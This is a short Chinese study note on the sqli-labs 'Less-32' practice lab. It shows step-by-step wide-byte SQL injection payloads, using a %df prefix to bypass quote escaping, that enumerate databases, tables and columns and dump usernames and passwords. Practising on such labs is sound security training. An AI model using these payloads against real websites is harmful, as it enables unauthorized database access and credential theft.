Sqli-labs-Less-32 （笔记）

通过界面显示可知需要使用post进行注入，使用burp进行抓包

查找注入点
uname=a’ or 1=1&passwd=admin&submit=Submit
查看提醒被转义

加上%df，报错

进行注释，成功，说明存在注入
uname=a%df’ or 1=1#&passwd=admin&submit=Submit

查看列数
uname=a%df’ order by 2#&passwd=admin&submit=Submit

为3时报错，说明存在2列

查看当前库
uname=a%df’ union select 1,database()#&passwd=admin&submit=Submit

查看所有库
uname=a%df’ union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=admin&submit=Submit

查看所有表
uname=a%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479#&passwd=admin&submit=Submit

查看所有字段
uname=a%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=admin&submit=Submit

查看所有账户和密码
uname=a%df’ union select 1,group_concat(concat_ws(0x7e,username,password)) from security.users#&passwd=admin&submit=Submit

以此类推爆出所有数据。